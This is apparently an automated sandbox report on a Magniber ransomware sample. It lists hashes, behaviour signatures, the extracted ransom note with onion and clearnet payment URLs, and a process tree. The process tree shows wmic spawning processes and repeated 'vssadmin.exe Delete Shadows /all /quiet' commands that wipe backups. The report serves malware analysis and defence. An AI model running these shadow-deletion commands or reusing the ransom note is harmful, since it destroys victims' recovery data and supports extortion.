Overview

overview

10

Static

static

c6b6ec00_b...is.exe

windows7_x64

10

c6b6ec00_b...is.exe

windows10_x64

3

Resubmissions

18-08-2021 23:22

210818-8e7ftqdsax 10

22-05-2021 11:01

210522-avrsva3a7s 10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    18-08-2021 23:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c6b6ec00_by_Libranalysis.exe

  • Size

    22KB

  • MD5

    c6b6ec00b64069d66c8d14d65f7cfd8f

  • SHA1

    b90e6bf12728fa3b0984aabc32b39f1db082a1da

  • SHA256

    7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed

  • SHA512

    c9d7c97c63806e87804c33530f48ba950542ba28421d354cb287c9bf027ff5a853b76200e87eadd3cde0469f4b8c93f8c4bc0e71f5e4aa1cdf33e05c0673254a

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://34704ac06214c040e8csnwyqmwa.erpp3f6j634gmj33.onion/csnwyqmwa Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://34704ac06214c040e8csnwyqmwa.jobsbig.cam/csnwyqmwa http://34704ac06214c040e8csnwyqmwa.nowuser.casa/csnwyqmwa http://34704ac06214c040e8csnwyqmwa.boxgas.icu/csnwyqmwa http://34704ac06214c040e8csnwyqmwa.bykeep.club/csnwyqmwa Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://34704ac06214c040e8csnwyqmwa.erpp3f6j634gmj33.onion/csnwyqmwa

http://34704ac06214c040e8csnwyqmwa.jobsbig.cam/csnwyqmwa

http://34704ac06214c040e8csnwyqmwa.nowuser.casa/csnwyqmwa

http://34704ac06214c040e8csnwyqmwa.boxgas.icu/csnwyqmwa

http://34704ac06214c040e8csnwyqmwa.bykeep.club/csnwyqmwa

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 4 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Users\Admin\AppData\Local\Temp\c6b6ec00_by_Libranalysis.exe
      "C:\Users\Admin\AppData\Local\Temp\c6b6ec00_by_Libranalysis.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:760
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1408
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1244
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
      • Modifies extensions of user files
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1108
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:1712
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://34704ac06214c040e8csnwyqmwa.jobsbig.cam/csnwyqmwa^&1^&49714945^&66^&315^&12"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1732
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://34704ac06214c040e8csnwyqmwa.jobsbig.cam/csnwyqmwa&1&49714945&66&315&12
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1796
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1796 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1396
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1752
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1532
    • C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:980
    • C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:636
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1916
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2128
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          3⤵
            PID:2376
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1416
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2232
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2392
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:2140
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            2⤵
              PID:2332
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1272
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1572
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2156
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2340
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2580
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2604
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2616
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2668
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
                PID:2692

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\Desktop\ApproveOpen.php.csnwyqmwa
                MD5

                42081712abd2f0d8c0fdfd51dad256c8

                SHA1

                68f2e039908f6193ebad5fd453b99d4fdb681ff0

                SHA256

                3d6643dd6b280d6d90fb1e3872a9490d19a60766c76219f2c225cf94ecd8dcfc

                SHA512

                6115effac04c4e52ef8533265014f9b438b4142e3a7106c11016c6aaf3ac0220400eff6b8bdb644723e076ea5ea30c5579fc3f057f221ff97214c6445ececc4b

                Download Submit

              • C:\Users\Admin\Desktop\CheckpointUnlock.svgz.csnwyqmwa
                MD5

                0e9d64d1b644771563a40872ac1f6329

                SHA1

                cb0d41b49c40c4f9a86bc9ac2b59db130b9caa3b

                SHA256

                391920a85a603e2409fd8ec4d34c996848bfed0bd90f1ea4c9bbd650034f85ad

                SHA512

                3622bdb7afc44d6d59240e9181c8e4ca49b8862f21b43cb9767a39b477050d6d3030a8dcdc1b014b05cc0af3eb83716c271a23037649b6b0442ee8acb7a754fb

                Download Submit

              • C:\Users\Admin\Desktop\EditGet.mpeg.csnwyqmwa
                MD5

                659159fa0ab864d7ced24615e1a58264

                SHA1

                b076a1bc0f856089bcf57c38a1c952e4e7642eaf

                SHA256

                2803787dbc33e9f773075cb54adb92be2c4a1aa8ff0066d3e580d3df0caeddb2

                SHA512

                e181f2e6b486044e4f16f85def2f8eb748f4bfbae1dfb589fbf9465f3cd501cb57464dd76da41f733a44ce2186aefbde6ffc22f723060dfb5522529988d5f535

                Download Submit

              • C:\Users\Admin\Desktop\EnableExport.wmv.csnwyqmwa
                MD5

                bbaa3cd7b906c70166dfbe7b7223283e

                SHA1

                819f182ce15a091a58c00e155ad0b19de23e3e05

                SHA256

                6fcf252451982d0c87b6f3713b59fdd7a5786146862fcafe66fda8362a417970

                SHA512

                26ae060e2cad3e6dbc25a6b7b3ccb38832ce07b6bc04312bd333708dc492931cb56577171b3f7b8432fbe3eadeaba796dcea09a7067112baee9604c1e3810fc2

                Download Submit

              • C:\Users\Admin\Desktop\HideUse.dotx.csnwyqmwa
                MD5

                2542ed56f85ed4cd05fbea67e8b60552

                SHA1

                cd12067382e9de10fbcdb77856f8dc1a70ec185c

                SHA256

                a1b8b319a4d153c4741f76300d4226238eec14a8151cf4f8e3b952cab6d6e0b3

                SHA512

                93e0539b6271524292fc45f20e9fcb901bf39ace148a6c9d0015c616ef136798e982d79014fc2acb83302f6f10c8879a5c877be3e4e25296fbf7a402bba90784

                Download Submit

              • C:\Users\Admin\Desktop\MergeMove.dxf.csnwyqmwa
                MD5

                d26c00c37d5991d48c928307a6a4776c

                SHA1

                762f7aa3c0d03d9ea9e3118095121295af9bbcfd

                SHA256

                22e71d17137dae851d3c84892117fb953e2ac3273c95ce6f57abc6759397c76b

                SHA512

                e2adc0b1e457d681b7f51f44679077918eeee9462a86798a0025574e32e0adaadf499bb6fc2b8d1ce45e786d748e2b334dd2118e4f424a12a45aa22eaddbcadf

                Download Submit

              • C:\Users\Admin\Desktop\PopWatch.zip.csnwyqmwa
                MD5

                d35ae5207fd40e47a3c085c75d64ce13

                SHA1

                33f359f7f6a9f5d9a0acbc44ac219d8e0b51a3d1

                SHA256

                4fbf1806f781ec7529faec789601aeda53806e1e00d99ec147f1544e07ac21dd

                SHA512

                aa7819041f9cebda33d1cf62c3651abdd5c91a98c0b142e9c047f12ed7c9cd5c9d15e290d5472663691dc5db52a7ec5ba17395477cb886dbd0172baaf7c00857

                Download Submit

              • C:\Users\Admin\Desktop\ReceiveLimit.bmp.csnwyqmwa
                MD5

                12971c1b25aef17552833b8ef8c35403

                SHA1

                9cc61c27a29a11e84ca783a665686f87324971bf

                SHA256

                5fdfa94a5f0b8c7a09fc55ea50250894fa193490054abaec1111e1bb61322397

                SHA512

                a8cd82b22aa097e7830c349177b56da02e5b13e01d32de1a0ec354c9471ec903b190e1a3567a969a3974445ca217cdc54dedd8cb63448de9e31bc5260e29b50b

                Download Submit

              • C:\Users\Admin\Desktop\ShowPublish.mov.csnwyqmwa
                MD5

                1025208bc0d6cb27a87b5928cbfe3d57

                SHA1

                40d597edd2e7722ad0a84a283cfa42757833e6b8

                SHA256

                3364b9a4d035e3637042f24c20c7a30b8918407dac27169683206e7eae644ec2

                SHA512

                66ac94177e1607193cdd5c49f9ff7ae0e9388a6a6c002a8958d66ca4ad356a16bed6c8395107bcd0daacba2af86f87e946905ead6c40aa75f7240689da2f956e

                Download Submit

              • C:\Users\Admin\Desktop\readme.txt
                MD5

                a7003039257ddcb43b7583a47852c4c1

                SHA1

                785ba41e3b5330e4a2a381181b7c6e6293c60c27

                SHA256

                0123ee0e82e3a162dead3dbf721475adc2a7b0a55dd4f321380985e98ed1c18d

                SHA512

                9a86cb573a6b4a5566a4ae6d180914db9c68a7ff85117f372e64190f0ff923c1c0fc537fb298068cbfed1ed9dcd15b3021dd0d1a7ac53c9a8b1100ab47b13e40

                Download Submit

              • C:\Users\Public\readme.txt
                MD5

                a7003039257ddcb43b7583a47852c4c1

                SHA1

                785ba41e3b5330e4a2a381181b7c6e6293c60c27

                SHA256

                0123ee0e82e3a162dead3dbf721475adc2a7b0a55dd4f321380985e98ed1c18d

                SHA512

                9a86cb573a6b4a5566a4ae6d180914db9c68a7ff85117f372e64190f0ff923c1c0fc537fb298068cbfed1ed9dcd15b3021dd0d1a7ac53c9a8b1100ab47b13e40

                Download Submit

              • memory/636-87-0x0000000000000000-mapping.dmp

                Download

              • memory/760-88-0x0000000000000000-mapping.dmp

                Download

              • memory/980-86-0x0000000000000000-mapping.dmp

                Download

              • memory/1028-62-0x00000000001F0000-0x00000000001F1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1028-61-0x00000000001E0000-0x00000000001E1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1028-60-0x0000000000020000-0x0000000000025000-memory.dmp

                Filesize

                20KB

                Download

              • memory/1196-63-0x0000000003AA0000-0x0000000003AB0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1244-71-0x0000000000000000-mapping.dmp

                Download

              • memory/1396-89-0x0000000000000000-mapping.dmp

                Download

              • memory/1408-81-0x0000000000000000-mapping.dmp

                Download

              • memory/1532-82-0x0000000000000000-mapping.dmp

                Download

              • memory/1712-65-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

                Filesize

                8KB

                Download

              • memory/1712-64-0x0000000000000000-mapping.dmp

                Download

              • memory/1728-83-0x0000000000000000-mapping.dmp

                Download

              • memory/1732-67-0x0000000000000000-mapping.dmp

                Download

              • memory/1752-68-0x0000000000000000-mapping.dmp

                Download

              • memory/1796-84-0x0000000000000000-mapping.dmp

                Download

              • memory/2128-90-0x0000000000000000-mapping.dmp

                Download

              • memory/2140-91-0x0000000000000000-mapping.dmp

                Download

              • memory/2156-92-0x0000000000000000-mapping.dmp

                Download

              • memory/2232-96-0x0000000000000000-mapping.dmp

                Download

              • memory/2332-98-0x0000000000000000-mapping.dmp

                Download

              • memory/2340-99-0x0000000000000000-mapping.dmp

                Download

              • memory/2376-100-0x0000000000000000-mapping.dmp

                Download

              • memory/2392-101-0x0000000000000000-mapping.dmp

                Download